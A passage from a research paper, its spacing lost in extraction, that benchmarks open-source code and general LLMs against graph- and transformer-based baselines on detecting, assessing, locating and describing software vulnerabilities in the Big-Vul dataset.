equallyandfixallSVssimultaneously.Thus,itisneces- effectively generate vulnerability descriptions within sarytoprioritizethesedetectedsoftwarevulnerabilities software systems and compare their performance with for better treatment. An effective solution to prioritize thatofpre-trainedLMs. those SVs is to use one of the most widely known3 To extensively and comprehensively analyze the LLMs’ language model InstructGPT [28] with a dialog interface ability, we use a large-scale dataset containing real-world that is fine-tuned using the Reinforcement Learning with project vulnerabilities (named Big-Vul [21]). We carefully HumanFeedback(RLHF)approach[28]–[30].RLHFinitially design experiments to discover the findings by answering fine-tunesthebasemodelusingasmalldatasetofprompts fourRQs.Themaincontributionofourworkissummarized as input and the desired output, typically human-written, as follows and takeaway findings are shown in Table 1. to refine its performance. Subsequently, a reward model is Eventually,wepresentthecomparisonofLLMsacrossfour trainedonalargersetofpromptsbysamplingoutputsgen- softwarevulnerabilitytasksunderdifferentsettings,aswell erated by the fine-tuned model. These outputs are then re- as the impact of varying model sizes on performance, as orderedbyhumanlabelerstoprovidefeedbackfortraining depicted in Fig. 2(a) and Fig. 2(b). In summary, the key therewardmodel.Reinforcementlearning[31]isthenused contributionsofthispaperinclude: to calculate rewards for each output generated based on • We extensively evaluate the performance of LLMs on the reward model, updating LLM parameters accordingly. different software vulnerability tasks and conduct an With fine-tuning and alignment with human preferences, extensive comparison among LLMs and learning-based LLMs better understand input prompts and instructions, approachestosoftwarevulnerability. enhancingperformanceacrossvarioustasks[28],[32]. • We design four RQs to comprehensively understand The application of LLMs in software engineering has LLMs from different dimensions, and provide detailed seen a surge, with models like ChatGPT being employed resultswithexamples. for various tasks (e.g., code review, code generation, and • Wereleaseourreplicationpackageforfurtherstudy[22]. vulnerability detection). Although some works use LLMs forvulnerabilitytasks[33],[34],ourworkdiffersfromthese
previousstudiesinthefollowingaspects.(1)Closed-source 2 BACKGROUND AND RELATED WORK ChatGPT vs. Open-source LLMs: They only explore the 2.1 LargeLanguageModel capabilities of the closed-source ChatGPT in vulnerability Since the advancements in Natural Language Processing, tasks, whereas we investigate the abilities of both open- Large Language Models (LLMs) [1] have seen widespread sourcecode-relatedLLMsandgeneralLLMsinthesetasks. adoptionduetotheircapacitytobeeffectivelytrainedwith (2) Prompts vs. Few-shot and Fine-tuning Settings: They billions of parameters and training samples, resulting in focus solely on the performance of LLMs using prompts, significantperformanceenhancements.LLMscanreadilybe whichintroducesrandomnessandhindersthereproducibil- applied to downstream tasks through either fine-tuning [2] ityoftheirfindings.Incontrast,weexaminethecapabilities orprompting[3].Theirversatilitystemsfrombeingtrained ofLLMsunderbothfew-shotandfine-tuningsettings,pro- topossessabroadunderstanding,enablingthemtocapture viding the source code and corresponding model files to diverse knowledge across various domains. Fine-tuning ensurethereproducibilityofourexperimentalresults. involves updating the model parameters specifically for a given downstream task through iterative training on a 2.2 SoftwareVulnerability specificdataset.Incontrast,promptingallowsfordirectuti- Software Vulnerabilities (SVs) can expose software systems lizationbyprovidingnaturallanguagedescriptionsorafew to risk situations and consequently make the software un- examplesofthedownstreamtask.Comparedtoprompting, dercyber-attacks,eventuallycausinghugeeconomiclosses fine-tuningisresource-intensiveasitnecessitatesadditional andeventhreateningpeople’slives.Therefore,vulnerability modeltrainingandisapplicableinlimitedscenarios,partic- databaseshavebeencreatedtodocumentandanalyzepub- ularlywhenadequatetrainingdatasetsareunavailable. liclyknownsecurityvulnerabilities.Forexample,Common LLMs are usually built on the transformer architec- VulnerabilitiesandExposures(CVE)[35],[36]andSecurity- ture [23] and can be classified into three types of ar- Focus[37]aretwowell-knownvulnerabilitydatabases.Be- chitectures: encoder-only, encoder-decoder, and decoder- sides, Common Weakness Enumeration (CWE) defines the only. Encoder-only (e.g., CodeBERT [24], GraphCode- commonsoftwareweaknessesofindividualvulnerabilities, BERT [25], and UniXcoder [26]) and Encoder-Decoder which are often referred to as vulnerability types of CVEs. (e.g., PLBART [27], CodeT5 [7], and CodeT5+ [8]) mod- To better address these vulnerabilities, researchers have els are trained using Masked Language Modeling (MLM) proposed many approaches for understanding the effects or Masked Span Prediction (MSP) objective, respectively, of software vulnerabilities, including SV detection [38]– whereasmallportion(e.g.,15%)ofthetokensarereplaced [50],SVassessment[20],[51]–[54],SVlocation[55]–[57],SV with either masked tokens or masked span tokens, LLMs repair [58]–[61] as well as SV description [62]–[65]. Many are trained to recover the masked tokens. These models novel technologies are adopted to promote the progress are trained as general ones on the code-related data and of software vulnerability management, including software then are fine-tuned for the downstream tasks to achieve analysis [66], [67], machine learning [38], [45], and deep superior performance. Decoder-only models also attract a learning[51],[56],especiallyLLMs[63],[64]. small portion of people’s attention and they are trained by using Causal Language Modeling objectives to predict 3 EXPERIMENTAL DESIGN the probability of the next token given all previous tokens. GPT[2]anditsvariantsarethemostrepresentativemodels, In this section, we present our studied dataset, our studied whichbringthelargelanguagemodelsintopracticalusage. LLMs,thetechniquesforfine-tuning,thepromptengineer- Recently, the ChatGPT model attracts the widest atten- ing,thebaselineapproaches,theevaluationmetrics,andthe tion from the world, which is the successor of the large experimentsettings.4 TABLE1:Takeaways:EvaluatingLLMsonSoftwareVulnerability Dimension FindingorGuidance 1 .LLMscandetectvulnerabilities,butfine-tunedLLMsperformweakerthantransformer-based approaches.ConsideringthecomputationalresourcesandtimecostsofdeployingLLMs, transformer-basedapproachesforvulnerabilitydetectionareamoreefficientchoice. 2 .After fine-tuning,thedetectioncapabilityofLLMshasimproved.Largermodelsusuallyperformbetter, VulnerabilityDetection butperformancecanalsobeinfluencedbymodeldesignandpre-trainingdata.Therefore, fine-tuningtheLLMondomain-specificdatabeforeusingitasavulnerabilitydetectorisnecessary. 3 .Ingeneral,differentLLMscomplementingeachother,whileCodeLlamaobtainsbetter performanceintermsofF1-score,Precision,andRecall. 4 .Overall,fine-tunedcode-relatedLLMsoutperformpre-trainedlanguagemodelsinvulnerability assessment.Whenresourcespermit,fine-tuningDeepSeek-Coder6.7Bforvulnerabilityassessmentis VulnerabilityAssessment optimal,asitoutperformsthepre-trainedlanguagemodelsacrossfourmetrics. 5 .LLMshavethe capacityforassessmentofvulnerabilityseveritybasedonsourcecode,andcanbeimprovedby
providingmorecontextinformation. 6 .Few-shotsettingexposesLLM’slimitations,andfine-tuningcangreatlyenhancethe VulnerabilityLocation vulnerabilitylocationcapabilitiesofLLMs. 7 .Fine-tuningcode-relatedLLMsasvulnerability locatorsisbeneficial,astheycanoutperformpre-trainedlanguagemodelsintermsofF1-score, precision,andFPR. 8 .LLMsexhibitsignificantlyweakerperformanceingeneratingvulnerabilitydescriptions VulnerabilityDescription comparedtopre-trainedlanguagemodels.Therefore,fine-tuningpre-trainedlanguagemodelsfor vulnerabilitydetectionisrecommended. 3.1 StudiedDataset TABLE2:Statisticofthestudieddataset Weadoptthewidelyuseddataset(namedBig-Vul)provided byFanetal.[21]byconsideringthefollowingreasons.The Datasets #Vul. #Non-Vul. #Total %Vul.:Non-Vul. mostimportantoneistosatisfythedistinctcharacteristicsof OriginalBig-Vul 10,900 177,736 188,636 0.061 therealworldaswellasthediversityinthedataset,which FilteredBig-Vul 5,260 96,308 101,568 0.055 is suggested by previous works [45], [47]. Big-Vul, to the Training 8,720 8,720 17,440 1 bestofourknowledge,isthemostlarge-scalevulnerability Validation 1,090 17,774 18,864 0.061 Testing 1,090 17,774 18,864 0.061 dataset with diverse information about the vulnerabilities, ∗Weundersamplethenon-vulnerablefunctionstoproduceapproximately which are collected from practical projects and these vul- balancedtrainingdata. nerabilitiesarerecordedintheCommonVulnerabilitiesand Exposures(CVE)1.Thesecondoneistocomparefairlywith existing state-of-the-art (SOTA) approaches (e.g., LineVul, 3.2 StudiedLLMs Devign,andSVulD). ThegeneralLLMsarepre-trainedontextualdata,including Big-Vul totally contains 3,754 code vulnerabilities col- natural language and code, and can be used for a variety lected from 348 open-source projects spanning 91 different oftasks.Incontrast,code-relatedLLMsarespecificallypre- vulnerabilitytypesfrom2002to2019.Ithas188,636C/C++ trainedtoautomatecode-relatedtasks.Duetotheempirical functionswithavulnerableratioof5.7%(i.e.,10,900vulner- nature of this work, we are interested in assessing the abilityfunctions).Theauthorslinkedthecodechangeswith effectiveness of both LLM categories in vulnerability tasks. CVEs and their descriptive information to enable a deeper For the code-related LLMs, we select the top four models analysisofthevulnerabilities. released recently (in 2023), namely DeepSeek-Coder [9], We follow the same strategy to build the training data, CodeLlama[11],StarCoder[10],andWizardCoder[68].For validation data, and testing data from the original dataset the general LLMs, we select the top two models, result- withpreviousworkdoes[39],[48],[58].Specifically,80%of ing in the selection of Mistral [69], and Phi-2 [70]. For functions are treated as training data, 10% of functions are the few-shot setting, we select the models with no more treatedasvalidationdata,andtheleft10%offunctionsare than 34B parameters from the Hugging Face Open LLM treatedastestingdata.Wealsokeepthedistributionassame Leaderboard [71], as for the fine-tuning setting, we select astheoriginalonesintraining,validation,andtestingdata. the models with 7B parameters or less. The constraint on Notice that we undersample the non-vulnerable functions the number of parameters is imposed by our computing to produce approximately balanced training data at the resources (i.e., 192GB RAM, 10 × NVIDIA RTX 3090 GPU). functionlevel,whilethevalidationandtestingdataremain Table3summarizesthecharacteristicsofthestudiedLLMs, in the original imbalanced ratio. To clean and normalize we briefly introduce these LLMs to make our paper self- the dataset, we remove empty lines, leading and trailing contained. spaces in each line, as well as comments from the source Group 1: Code-related LLMs.DeepSeek-Coderdeveloped code.Finally,thesplitdatasetisusedforevaluationandthe byDeepSeekAI[9]iscomposedofaseriesofcodelanguage statisticsareshowninTable2. models, each trained from scratch on 2T tokens, with a 1.https://cve.mitre.org/ compositionof87%codeand13%naturallanguageinboth5 TABLE3:OverviewofthestudiedLLMs thingslikewriting,summarizingtexts,andcoding,butwith bettercommonsenseandunderstandingthanitsearlierver- Code-relatedLLMs GeneralLLMs Models sion,Phi-1.5.Phi-2’sevaluationdemonstratesitsproficiency DeepSeek-Coder CodeLlama StarCoder WizardCoder Mistral Phi-2 Fine-Tuning 6.7B 7B 7B 7B 7B 2.7B overlargermodelsinaggregatedbenchmarks,emphasizing Few-Shot 6.7B&33B 7B&34B 7B&34B 7B&15.5B 7B 2.7B the potential of smaller models to achieve comparable or ReleaseDate Nov’23 Aug’23 May’23 June’23 Sep’23 Dec’23 superior performance to their larger counterparts. This is particularly evident in its comparison with Google Gemini English and Chinese. They provide various sizes of the Nano2,wherePhi-2outshinesdespiteitssmallersize. code model, ranging from 1B to 33B versions. Each model is pre-trained on project-level code corpus by employing 3.3 ModelFine-Tuning a window size of 16K and an extra fill-in-the-blank task, to support project-level code completion and infilling. For Thefoursoftwarevulnerabilitytaskscanbecategorizedinto coding capabilities, DeepSeek-Coder achieves state-of-the- two types: discriminative task (i.e., software vulnerability
artperformanceamongopen-sourcecodemodelsonmulti- detection, software vulnerability assessment, and software pleprogramminglanguagesandvariousbenchmarks. vulnerability location) and generative task (i.e., software CodeLlama proposed by Rozie`re et al. [11] is a set of vulnerability description). Therefore, fine-tuning LLMs for large pre-trained language models for code built on Llama software vulnerability tasks can be undertaken through 2. They achieve state-of-the-art performance among open both discriminative and generative methods, each method modelsoncodetasks,provideinfillingcapabilities,support specifically designed to make LLMs aligned with the task. largeinputcontexts,anddemonstratezero-shotinstruction Inparticular,wetreatthediscriminativetasksasbinaryclas- followingforprogrammingproblems.CodeLlamaiscreated sification, while treating the generative task as generation by further training Llama 2 using increased sampling of one.Thearchitecturesforthetwoparadigmsarepresented code data. As with Llama 2, the authors applied extensive inFig.3. safetymitigationstothefine-tunedCodeLlamaversions. StarCoder proposed by Li et al. [10] is a large pre- trained language model specifically designed for code. It 0 1 0 CVE description: A remote code ... was pre-trained on a large amount of code data to acquire Classifier Decoder programming knowledge and trained on permissive data ... ... ... ... from GitHub, including over 80 programming languages, Encoder / Decoder Encoder / Decoder Git commits, GitHub issues, and Jupyter notebooks. Star- Coder can perform code editing tasks, understand natural void set () { . . . write ( length ... . . . } void set () { . . . write ( length ... . . . } languageprompts,andgeneratecodethatconformstoAPIs. StarCoder represents the advancement of applying large (a) DiscriminativeFine-Tuning (b) GenerativeFine-Tuning languagemodelsinprogramming. WizardCoder proposed by Luo et al. [68] is a large Fig.3:Fine-tuningLLMsforsoftwarevulnerabilitytasks pre-trained language model that empowers Code LLMs withcomplexinstructionfine-tuning,byadaptingtheEvol- Discriminative Fine-Tuning. For vulnerability detec- Instruct method to the domain of code. Through compre- tion and vulnerability assessment, we utilize the “Au- hensive experiments on four prominent code generation toModelForSequenceClassification” class provided by the benchmarks,namelyHumanEval,HumanEval+,MBPP,and Transformers library to implement discriminative fine- DS-1000, the authors unveil the exceptional capabilities of tuning. “AutoModelForSequenceClassification” is a generic their model. It surpasses all other open-source Code LLMs model class that will be instantiated as one of the by a substantial margin. Moreover, WizardCoder even out- sequence classification model classes of the library performs the largest closed LLMs, Anthropic’s Claude and when created with the “AutoModelForSequenceClassifica- Google’sBard,onHumanEvalandHumanEval+. tion.from pretrained(model name or path)”classmethod. Group 2: General LLMs. Mistral is a 7-billion-parameter For vulnerability location, we follow previous language model released by Mistral AI [69]. Mistral 7B is works [72], [73] that use LLMs to classify individual code a carefully designed language model that provides both lines as either vulnerable or non-vulnerable. For a token efficiency and high performance to enable real-world ap- sequence T = {t 1,t 2,...,t n} of the function, the model’s plications.Duetoitsefficiencyimprovements,themodelis decoder component, denoted as M, processes T to yield a suitableforreal-timeapplicationswherequickresponsesare sequence of output vectors: O = M(T) = {o 1,o 2,...,o L}, essential.Atthetimeofitsrelease,Mistral7Boutperformed where O represents the output tensor with dimensions the best open source 13B model (Llama 2) in all evaluated L×H, L signifies the sequence length, and H denotes the benchmarks. hidden dimension size. During the process, the contextual Phi-2proposedbyMicrosoft[70]packedwith2.7billion information is captured by the masked self-attention parameters.Itisdesignedtomakemachinesthinkmorelike mechanisms in the decoder of LLMs, where masked self- humansanddoitsafely.Phi-2isnotjustaboutnumbers;it attention limits the sight to the preceding part of tokens. is about a smarter, safer way for computers to understand Each output vector o i that represents the last token of one and interact with the world. Phi-2 stands out because it is lineissubsequentlyassociatedwithalabel(i.e.,0or1).The been taught with a mix of new language data and careful optimization process employs the binary cross-entropy as checks to make sure it acts right. It is built to do many thelossfunction.6 TABLE4:Thetaskdescriptionsandindicatorsfordifferentsoftwarevulnerabilitytasks Dimension TaskDescription Indicator VulnerabilityDetection IfthisCcodesnippethasvulnerabilities,outputYes;otherwise,outputNo. //Detection VulnerabilityAssessment ProvideaqualitativeseverityratingsofCVSSv2.0forthevulnerableCcodesnippet. //Assessment VulnerabilityLocation ProvideavulnerabilitylocationresultforthevulnerableCcodesnippet. //Location VulnerabilityDescription ProvideaCVEdescriptionforthevulnerableCcodesnippet. //Description Generative Fine-Tuning. Generative fine-tuning aims to Prompt equip LLMs with the ability to perform Sequence-to- 1 Task Description: Sequence (Seq2Seq) tasks. Specifically, this involves in-
putting vulnerable code and generating the corresponding If this C code snippet has vulnerabilities, output Yes; otherwise, output No. CVEdescriptionsrelatedtothevulnerabilities.Tocalculate 2 Source Code: thelossduringfine-tuning,weutilizethecross-entropyloss // Code Start function, which is commonly used for Seq2Seq tasks. In void SendStatus(struct mg_connection* connection, const struct this context, the loss measures the difference between the mg_request_info* request_info, void* user_data) { generatedoutputsequenceandthetargetsequence. std::string response = "HTTP/1.1 200 OK\r\n" "Content-Length:2\r\n\r\n" "ok"; 3.4 PromptEngineering mg_write(connection, response.data(), response.length()); Forfew-shotsetting,wefollowthepromptsimilartothose } used in the artifacts, papers, or technical reports associated // Code End with each corresponding model [5], [10], [11], where each 3 Indicator: prompt contains three pieces of information: (1) task de- // Detection scription, (2) source code, and (3) indicator. Using the soft- warevulnerabilitydetectiontaskasanexample,theprompt Fig. 4: The prompt contains three pieces of information: (1) utilized for LLM consists of three crucial components, as taskdescription,(2)sourcecode,and(3)indicator depictedinFig.4: • Task Description (marked as ①). We provide LLM with the description constructed as ‘‘If this C code are designed for learning data representations and trained snippet has vulnerabilities, output Yes; using the Masked Language Modeling (MLM) objective. otherwise, output No’’. The task description used Encoder-decoder LMs (i.e., PLBART [27], CodeT5 [7], and in the SV detection task varies based on the source CodeT5+[8])havebeenproposedforsequence-to-sequence programminglanguageweemploy. tasks. They are trained to recover the correct output se- • Source Code (marked as ②). We provide LLM with the quencegiventheoriginalinput,oftenthroughspanpredic- codewrappedin‘‘// Code Start’’and‘‘// Code tion tasks where random spans are replaced with artificial End’’SinceweillustrateanexampleinC,weusetheC tokens. Recently, researchers have combined MLM with commentformatof‘‘//’’asaprefixforthedescription. generative models for bidirectional and autoregressive text We also employ different comment prefixes based on the generationorinfilling[74].AlltheseLMscanpotentiallybe programminglanguageofthecode. usedforourtasks,soweevaluatetheseLMs. • Indicator(markedas③).WeinstructLLMtothinkabout the results. In this paper, we follow the best practice in TABLE5:OverviewofthestudiedLMs previous work [12] and adopt the same prompt named ‘‘// Detection’’. Models #Para. ModelType Models #Para. ModelType CodeBERT 125M Encoder-onlyLM PLBART 140M Encoder-decoderLM Depending on the specific software vulnerability tasks, GraphCodeBERT 125M Encoder-onlyLM CodeT5 220M Encoder-decoderLM the task descriptions and indicators in the prompts may UniXcoder 125M Encoder-onlyLM CodeT5+ 220M Encoder-decoderLM ∗ForUniXcoder,weuseencoder-onlymode. vary.Thetaskdescriptionsandindicatorsfordifferentsoft- warevulnerabilitytasksarepresentedinTable4. Forvulnerabilitylocation,wealsoconsiderDevign[38], Reveal [47], IVDetect [56], and LineVul [39] as baselines. 3.5 Baselines In addressing vulnerability detection, we also include TocomprehensivelycomparetheperformanceofLLMswith SVulD [48] in addition to the aforementioned approaches. existing approaches, in this study, we consider the various Webrieflyintroducethemasfollows. pre-trained Language Models (LMs). As shown in Table 5, Devign proposed by Zhou et al. [38] is a general graph these models have fewer than 220 million parameters and neural network-based model for graph-level classification can be categorized into two categories: encoder-only LMs through learning on a rich set of code semantic representa- and encoder-decoder LMs. Encoder-only LMs (i.e., Code- tionsincludingAST,CFG,DFG,andcodesequences.Ituses BERT[24],GraphCodeBERT[25],andUniXcoder[26])con- a novel Conv module to efficiently extract useful features tain only the encoder component of a Transformer. They in the learned rich node representations for graph-level7 classification. our computing resources. Table 3 summarizes the charac- RevealproposedbyChakrabortyetal.[47]containstwo teristics of the studied LLMs. Furthermore, considering the main phases. In the feature extraction phase, it translates limitation of LLM’s conversation windows, we manually code into a graph embedding, and in the training phase, selectthreeexamplesforthefew-shotsettingfromthetrain- ittrainsarepresentationlearnerontheextractedfeaturesto ingdata.Regardingbaselines(i.e.,pre-trainedLMs,Reveal, obtainamodelthatcandistinguishthevulnerablefunctions IVDetect, Devign, LineVul, and SVulD), we utilize their fromnon-vulnerableones. publiclyavailablesourcecodeandperformfine-tuningwith IVDetect proposed by Li et al. [56] contains the coarse- thedefaultparametersprovidedintheiroriginalcode.Con- grainedvulnerabilitydetectioncomponentandfine-grained sidering Devign’s code is not publicly available, we make interpretation component. In particular, IVDetect repre- everyefforttoreplicateitsfunctionalityandachievesimilar sents source code in the form of a program dependence results on the original paper’s dataset. All these models
graph(PDG)andtreatsthevulnerabilitydetectionproblem are implemented using the PyTorch [75] framework. The as graph-based classification via graph convolution net- evaluationisconductedona16-coreworkstationequipped workwithfeatureattention.Asforinterpretation,IVDetect withanIntel(R)Xeon(R)Gold6226RCPU@2.90Ghz,192GB adopts a GNNExplainer to provide fine-grained interpre- RAM, and 10 × NVIDIA RTX 3090 GPU, running Ubuntu tations that include the sub-graph in PDG with crucial 20.04.1LTS. statementsthatarerelevanttothedetectedvulnerability. LineVul proposed by Fu et al. [39] is a Transformer- 4 EXPERIMENTAL RESULTS based line-level vulnerability prediction approach. LineVul leveragesBERTarchitecturewithself-attentionlayerswhich Thissectionpresentstheexperimentalresultsbyevaluating cancapturelong-termdependencieswithinalongsequence. LLMs performances on the widely used comprehensive Besides, benefiting from the large-scale pre-trained model, dataset(i.e.,Big-Vul[21])coveringfourSV-relatedtasks. LineVulcanintrinsicallycapturemorelexicalandlogicalse- manticsforthegivencodeinput.Moreover,LineVuladopts TABLE 6: The comparison between LLMs and eleven base- the attention mechanism of BERT architecture to locate the linesonsoftwarevulnerabilitydetection(RQ1) vulnerablelinesforfiner-graineddetection. SVulD proposed by Ni et al. [48] is a function-level Methods F1-score Recall Precision Accuracy subtlesemanticembeddingforvulnerabilitydetectionalong Devign 0.200 0.660 0.118 0.726 withheuristicexplanations.Particularly,SVulDadoptscon- Reveal 0.232 0.354 0.172 0.811 IVDetect 0.231 0.540 0.148 0.815 trastive learning to train the UniXcoder semantic embed- LineVul 0.272 0.620 0.174 0.828 ding model for learning distinguishing semantic represen- SVulD 0.336 0.414 0.282 0.915 tationoffunctionsregardlessoftheirlexicallysimilarinfor- CodeBERT 0.270 0.608 0.173 0.830 GraphCodeBERT 0.246 0.721 0.148 0.771 mation. UniXcoder 0.256 0.787 0.153 0.764 PLBART 0.255 0.692 0.157 0.791 CodeT5 0.237 0.759 0.141 0.748 3.6 EvaluationMetrics CodeT5+ 0.218 0.508 0.139 0.812 Forconsideredsoftwarevulnerability-relatedtasks,wewill Fine-TuningSetting performevaluationsusingthewidelyadoptedperformance DeepSeek-Coder6.7B 0.270 0.627 0.172 0.824 metrics. More precisely, to evaluate the effectiveness of CodeLlama7B 0.259 0.806 0.154 0.761 StarCoder7B 0.220 0.607 0.135 0.778 LLMs on vulnerability detection and vulnerability assess- WizardCoder7B 0.214 0.365 0.151 0.861 ment,weconsiderthefollowingfourmetrics:F1-score,Re- Mistral 0.220 0.607 0.135 0.778 call,Precision,andAccuracy.Additionally,forvulnerability Phi-2 0.241 0.557 0.154 0.818 location, besides the four aforementioned metrics, we also Few-ShotSetting consider the Top-k Accuracy and FPR metrics. For vulner- DeepSeek-Coder6.7B 0.084 0.156 0.057 0.823 DeepSeek-Coder33B 0.107 0.688 0.058 0.404 ability description, we use Rouge-1, Rouge-2, and Rouge-L CodeLlama7B 0.098 0.449 0.055 0.570 metrics. CodeLlama34B 0.117 0.281 0.074 0.781 StarCoder7B 0.094 0.443 0.053 0.560 StarCoder15.5B 0.097 0.557 0.053 0.463 3.7 Implementation WizardCoder7B 0.086 0.380 0.049 0.583 WizardCoder34B 0.128 0.559 0.072 0.607 WedevelopthegenerationpipelineinPython,utilizingPy- Mistral 0.126 0.401 0.074 0.711 Torch[75]implementationsofDeepSeekCoder,CodeLlama, Phi-2 0.099 0.563 0.054 0.471 StarCoder, WizardCoder, Mistral, and Phi-2. We use the Huggingface [76] to load the model weights and generate outputs. We also adhere to the best-practice guide [77] 4.1 RQ-1:EvaluatingVulnerabilityDetectionofLLMs for each prompt. For the fine-tuning setting, we select the models with 7B parameters or less, and for the few-shot InthisRQ,wefirstinvestigatethevulnerabilitydetectionof setting, we use models with fewer than 34B parameters. LLMsandmakeacomparisonwiththeexistingstate-of-the- To directly compare the fine-tuning setting with the few- art (SOTA) approaches. Then, we conduct a more detailed shot setting, we employ models with the same parameter analysisoftheresults,comparingthedetectionperformance in both settings (i.e., DeepSeek-Coder 6.7B, CodeLlama 7B, ofLLMsundertheTop-10CWEtypes. StarCoder7B,WizardCoder7B,Mistral7B,andPhi-22.7B). ExperimentalSetting.WeinstructLLMswiththefollowing The constraint on the number of parameters is imposed by taskdescriptiontotellittoactasavulnerabilitydetector.8 TABLE7:ThesoftwarevulnerabilitydetectioncomparisononTop-10CWEsamongfine-tunedLLMs(RQ1) DeepSeek-Coder CodeLlama StarCoder WizardCoder Mistral Phi-2 DeepSeek-Coder CodeLlama StarCoder WizardCoder Mistral Phi-2 CWEType #Total #Vul. F1-score Precision CWE-119 1549 128 0.321 0.309 0.316 0.269 0.258 0.281 0.223 0.197 0.212 0.215 0.181 0.197 CWE-20 1082 80 0.269 0.273 0.229 0.216 0.145 0.269 0.173 0.163 0.141 0.165 0.096 0.175
CWE-264 800 64 0.486 0.468 0.337 0.348 0.356 0.477 0.357 0.316 0.232 0.308 0.269 0.361 CWE-399 697 35 0.355 0.286 0.209 0.274 0.227 0.306 0.227 0.169 0.125 0.191 0.143 0.196 CWE-125 582 29 0.233 0.267 0.213 0.195 0.179 0.180 0.145 0.156 0.129 0.128 0.108 0.109 CWE-200 573 27 0.269 0.261 0.241 0.180 0.162 0.229 0.182 0.159 0.151 0.132 0.106 0.152 CWE-189 442 21 0.235 0.208 0.255 0.273 0.178 0.293 0.145 0.119 0.151 0.180 0.108 0.182 CWE-362 413 16 0.031 0.086 0.075 0.050 0.026 0.032 0.017 0.045 0.040 0.029 0.014 0.018 CWE-416 406 12 0.193 0.178 0.148 0.145 0.146 0.141 0.113 0.101 0.083 0.093 0.086 0.082 CWE-476 367 11 0.091 0.109 0.053 0.057 0.037 0.019 0.049 0.057 0.028 0.032 0.020 0.010 DeepSeek-Coder CodeLlama StarCoder WizardCoder Mistral Phi-2 DeepSeek-Coder CodeLlama StarCoder WizardCoder Mistral Phi-2 CWEType #Total #Vul. Recall Accuracy CWE-119 1549 128 0.570 0.719 0.625 0.359 0.453 0.492 0.801 0.735 0.777 0.839 0.785 0.792 CWE-20 1082 80 0.609 0.844 0.609 0.313 0.297 0.578 0.804 0.735 0.758 0.866 0.793 0.814 CWE-264 800 64 0.763 0.900 0.613 0.400 0.525 0.700 0.839 0.795 0.759 0.850 0.810 0.846 CWE-399 697 35 0.815 0.926 0.630 0.481 0.556 0.704 0.885 0.821 0.815 0.901 0.854 0.877 CWE-125 582 29 0.586 0.931 0.621 0.414 0.517 0.517 0.808 0.746 0.771 0.830 0.763 0.765 CWE-200 573 27 0.514 0.743 0.600 0.286 0.343 0.457 0.829 0.743 0.770 0.841 0.784 0.812 CWE-189 442 21 0.625 0.813 0.813 0.563 0.500 0.750 0.853 0.776 0.828 0.891 0.833 0.869 CWE-362 413 16 0.200 0.800 0.600 0.200 0.200 0.200 0.847 0.794 0.821 0.908 0.821 0.855 CWE-416 406 12 0.667 0.750 0.667 0.333 0.500 0.500 0.835 0.796 0.773 0.884 0.828 0.820 CWE-476 367 11 0.571 1.000 0.429 0.286 0.286 0.143 0.782 0.687 0.706 0.820 0.719 0.725 Task Description: If this C code snippet has vulnerabilities, Accuracy, which surpass the fine-tuned LLMs by 24.4% to outputYes;otherwise,outputNo. 57.0%, 64.0% to 108.9%, and 6.3% to 20.2% in terms of F1- score,Precision,andAccuracy,respectively.Notably,theF1- score performance of LineVul is significantly lower (0.272) In addition to pre-trained LMs, we also consider the than that reported in the original paper (0.910). We further following five SOTA baselines: Devign [38], Reveal [47], analyzethisdiscrepancyinSection5.1. IVDetect [56], LineVul [39], and SVulD [48]. These base- (2)Theperformanceoffine-tunedLLMsiscomparable lines can be divided into two groups: graph-based (i.e., to graph-based approaches. For example, in terms of F1- Devign, Reveal, and IVDetect) and transformer-based (i.e., score, fine-tuned LLMs achieve a range of 0.214 to 0.270. pre-trained LMs, LineVul, and SVulD). Besides, in order In comparison, graph-based approaches achieve a range of tocomprehensivelycomparetheperformanceamongbase- 0.200to0.232. linesandLLMs,weconsiderfourwidelyusedperformance (3) LLMs under few-shot setting have poor perfor- measures(i.e.,Precision,Recall,F1-score,andAccuracy)and mance compared with baselines. LLMs ranging from 2.7B conduct experiments on the popular dataset. Since graph- to 34B parameters perform less favorably than baselines in based approaches need to obtain the structure information terms of F1-score and Precision. However, as for Accuracy, (e.g., control flow graph (CFG), data flow graph (DFG)) SVulD (transformer-based) obtains the best performance of the studied functions, we adopt the same toolkit with (0.915) and DeepSeek-Coder 6.7B under few-shot setting Joerntotransformfunctions.Thefunctionsaredroppedout achieves a performance of 0.823, which is better than the directlyiftheycannotbetransformedbyJoernsuccessfully. threegraph-basedapproaches. Finally, the filtered dataset (shown in Table 2) is used for evaluation.Wefollowthesamestrategytobuildthetraining Finding-1. LLMs can detect vulnerabilities, but fine-tuned data, validation data, and testing data from the original LLMs perform weaker than transformer-based approaches. datasetwithpreviousworkdoes[39],[58].Specifically,80% Consideringthecomputationalresourcesandtimecostsofde- of functions are treated as training data, 10% of functions ployingLLMs,transformer-basedapproachesforvulnerability aretreatedasvalidationdata,andtheleft10%offunctions detectionareamoreefficientchoice. are treated as testing data. We also keep the distribution as same as the original ones in training, validation, and [B] Fine-Tuning vs. Few-Shot.Theexperimentalresults testingdata.Weundersamplethenon-vulnerablefunctions are presented in Table 6. Based on these experimental find-
to produce approximately balanced training data at the ings, we can draw the following observations: (1) LLMs functionlevel,whilethevalidationandtestingdataremain fine-tunedforvulnerabilitydetectiondemonstratesuperior in the original imbalanced ratio. Apart from presenting the performance on the task compared to LLMs in the few- overall performance comparison, we also give the detailed shot setting. The average F1-score and average Precision performanceofLLMsontheTop-10CWEtypesforabetter havedoubled,whiletheaverageRecallhasalsoshownim- analysis. provement.(2)LLMswithmoreparameterstypicallyexhibit Results.[A] LLMs vs. Baselines.Table6showstheoverall betterperformance.Forexample,CodeLlama34Bimproves performancemeasuresbetweenLLMsandelevenbaselines upon CodeLlama 7B by 19.4%, 34.5%, and 37.0% in terms andthebestperformancesarehighlightedinbold.Accord- ofF1-score,Precision,andAccuracy,respectively.However, ing to the results in Table 6, we can obtain the following different LLMs may exhibit performance variations due to observations: differences in model design and the quality of pre-training (1)Fine-tunedLLMshavepoorperformancecompared data. (3) Phi-2 achieves performance approximating that of withtransformer-basedapproacheswhenconsideringF1- other LLMs with 7 billion parameters, even with a param- score,Precision,andAccuracy.Inparticular,SVulDobtains eter size of 2.7 billion. This may be attributed to the higher 0.336, 0.282, and 0.915 in terms of F1-score, Precision, and qualityofitspre-trainingdata.9 Finding-2.Afterfine-tuning,thedetectioncapabilityofLLMs from 0.512 to 0.854. This underscores the necessity of fine- hasimproved.Largermodelsusuallyperformbetter,butperfor- tuninginvulnerabilityassessmenttask.Overall,fine-tuned mancecanalsobeinfluencedbymodeldesignandpre-training code-related LLMs outperform pre-trained LMs in vulner- data. Therefore, fine-tuning the LLM on domain-specific data 